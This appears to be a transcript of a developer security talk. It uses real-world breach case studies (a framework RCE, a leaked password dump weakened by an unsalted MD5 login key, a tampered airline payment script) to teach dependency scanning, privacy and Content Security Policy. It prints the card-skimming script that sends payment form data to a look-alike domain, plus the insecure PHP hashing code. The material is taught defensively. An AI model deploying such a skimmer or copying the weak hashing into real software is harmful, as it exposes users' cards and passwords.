Danielle Adams | @adamzdanielle
Security is not the practice of keeping unauthorized parties out.
It is the practice of making an attack too costly or time-consuming to be worth the effort.
(Fake names are used because we aren't here to shame anyone.)
In March 2017, a remote code execution vulnerability in a Java web framework was publicly disclosed and patched. It was exploited after the fix was available, making it an n-day: a known vulnerability with a patch that had not been applied.
Attacker-controlled input in the Content-Type, Content-Disposition, and Content-Length headers was evaluated by the framework, allowing remote code to execute on the server.
145.5 million people's sensitive data was accessed by an unauthorized third-party.
The confidentiality of the user data had been breached.
Static analysis: analyzing the code for issues without executing it. Issues may include bugs that would only surface at runtime and dependencies with known vulnerabilities.
Different tools scan for different issues: ESLint and TypeScript are both examples.
Dependency scanning: analyze the source code and its manifests to find libraries with known vulnerabilities.
The best tools have a high true-positive rate, a low false-positive rate, and integrate well with existing workflows.
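As an added example (not code from the original talk), here is a minimal dependency scanner of the kind the slide describes: it reads a package.json-style manifest, resolves each dependency to the version pinned in a lockfile-style map, and reports any dependency whose version falls inside a known-vulnerable range. The advisory database, package names, versions and ranges are all constructed for illustration and are not real advisories; the version comparison ignores pre-release tags to stay short.

```javascript
// Added example: minimal dependency (SCA) scanner. All advisories, package
// names and versions below are constructed for illustration, not real data.

// Parse "1.2.3" (optionally "v1.2.3" or "1.2.3-beta") into [1, 2, 3].
// Pre-release tags are dropped to keep the comparison simple.
function parseVersion(v) {
  return v.replace(/^[v=]/, "").split("-")[0].split(".").map(Number);
}

// Compare two versions: negative if a < b, 0 if equal, positive if a > b.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// A version is vulnerable if introduced <= version < fixed.
// fixed === null means no patched release exists yet.
function inVulnerableRange(version, range) {
  if (compareVersions(version, range.introduced) < 0) return false;
  if (range.fixed === null) return true;
  return compareVersions(version, range.fixed) < 0;
}

// Constructed advisory database (hypothetical packages and ranges).
const ADVISORIES = [
  { id: "ADV-0001", pkg: "web-framework-core", introduced: "2.3.5", fixed: "2.3.32",
    summary: "request header content evaluated as an expression (remote code execution)" },
  { id: "ADV-0002", pkg: "left-pad-ish", introduced: "0.0.1", fixed: null,
    summary: "prototype pollution, no fix available" },
];

// Scan: the manifest lists declared dependencies, the lock maps each to the
// version actually installed. Unpinned dependencies are reported too, since
// their installed version cannot be checked.
function scanDependencies(manifest, lock) {
  const findings = [];
  for (const name of Object.keys(manifest.dependencies || {})) {
    const installed = lock[name];
    if (!installed) {
      findings.push({ pkg: name, issue: "not in lockfile (unpinned)" });
      continue;
    }
    for (const adv of ADVISORIES) {
      if (adv.pkg === name && inVulnerableRange(installed, adv)) {
        findings.push({ pkg: name, version: installed, advisory: adv.id,
                        fixed: adv.fixed, summary: adv.summary });
      }
    }
  }
  return findings;
}

// Constructed sample manifest and lock, as a CI step might read them from disk.
const SAMPLE_MANIFEST = {
  dependencies: { "web-framework-core": "^2.3.0", "left-pad-ish": "*", "safe-lib": "1.0.0" },
};
const SAMPLE_LOCK = { "web-framework-core": "2.3.20", "left-pad-ish": "0.0.3", "safe-lib": "1.0.0" };

const REPORT = scanDependencies(SAMPLE_MANIFEST, SAMPLE_LOCK);
for (const finding of REPORT) console.log(JSON.stringify(finding));
```

A real scanner would pull advisory data from a vulnerability feed and use a full semver implementation, but the shape is the same: resolve what is actually installed, then compare it against ranges, and fail the build on a hit.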
In September 2015, a data dump found online containing user data was confirmed to belong to the site.
Not long after, a second dump was released with internal emails and the source code for their websites.
The dump appeared to be a lost cause for password cracking because the passwords were hashed with bcrypt (hashed, not encrypted: there is no key that turns them back into passwords).
bcrypt is a password hashing algorithm that is deliberately slow, with a configurable cost factor. At the cost used, it would have taken years and expensive hardware to crack the password hash list.
[Slide graphic] Leaked hash list: a1bfe34, 01bbf82, de9283c, 3482498. Candidate passwords: mypassword, hello5, spot1234, danielle18. Code is run to hash each candidate and look for matches against the list.
$username = !empty($Values['username_suggest']) ? $Values['username_suggest'] : $Values['username'];
$password = User::encryptPassword($Values['password']);  // bcrypt hash, the one stored for login
$password = $Values['password'];                         // overwritten with the plaintext password
// second "hash": unsalted MD5 of the lowercased username and lowercased plaintext password
$loginkey = md5(strtolower($username).'::'.strtolower($password));
Entire profiles of 37 million users, including names, email addresses, phone numbers, credit card numbers, profile descriptions, weight and height, were released. The passwords would have stayed protected if the second hash had never been created: MD5 is fast and the loginkey was unsalted, so each guess cost one cheap hash instead of one slow bcrypt, and because the loginkey was derived from the plaintext password, cracking it recovered the very passwords bcrypt was guarding.
Confidentiality was breached, but, most importantly, the privacy of users was also breached.
Confidentiality refers to data; privacy refers to the person. It is just as important as the CIA triad (confidentiality, integrity, availability).
An attack on someone's privacy can put their emotions or life at immediate risk.
Work with security teams and engineers to create features and products that are secure by design.
In late 2018, there were reports that JavaScript assets served to the airline's desktop site and mobile app may have been tampered with.
window.onload = function() {
  // fire when the user releases the payment button (mouse or touch)
  jQuery("#submitButton").bind("mouseup touchend", function(a) {
    var n = {};
    // collect every field of the payment form into one object
    jQuery("#paymentForm").serializeArray().map(function(a) {
      n[a.name] = a.value;
    });
    // add the cardholder name displayed on the page
    var e = document.getElementById("personPaying").innerHTML;
    n.person = e;
    var t = JSON.stringify(n);
    // post the harvested data to the attacker's look-alike domain
    setTimeout(function() {
      jQuery.ajax({
        type: "POST",
        async: !0,
        url: "https://fakeaways.com/gateway/app/dataprocessing/api",
        data: t,
        dataType: "application/json"
      });
    });
  });
}
An external analysis of the code concluded that it was most likely a stored Cross-Site Scripting (XSS) attack.
The malicious code had been appended to one of the airline's own JavaScript files: a self-hosted copy of an open-source library that they served themselves.
XSS is #7 in the OWASP Top 10 (2017 edition) published by the Open Web Application Security Project.
Browsers don't have a secure default for what a page's scripts may do or where they may send data, so it is up to the developer to create a safe experience.
380 thousand users had their personal and financial details stolen while booking or updating reservations over a span of 15 days.
While it was a case of stolen data, the integrity of the website had also been compromised: the code the browser ran was not the code the airline shipped.
While the airline never publicly described the attack, a strict Content Security Policy (CSP) with a connect-src allow list may have helped. A CORS policy would not: Access-Control-Allow-Origin is a response header set by the server receiving the request, and it does not stop the browser from sending a POST to an attacker's domain.
By shipping a CSP whose connect-src is a trusted allow list, the site adheres to the design principle of secure default: scripts may only send data where the developer said they could.
// CSP header
// don't do this (or omit connect-src entirely): scripts may post anywhere
"Content-Security-Policy": "connect-src *"
// do this instead: only the airline's own origins may receive XHR/fetch data
"Content-Security-Policy": "connect-src 'self' https://*.realairways.com"
Understand what the browser and your protocol (i.e. HTTP) can offer in terms of security.
This is always changing.
Use failures as an opportunity to create better software.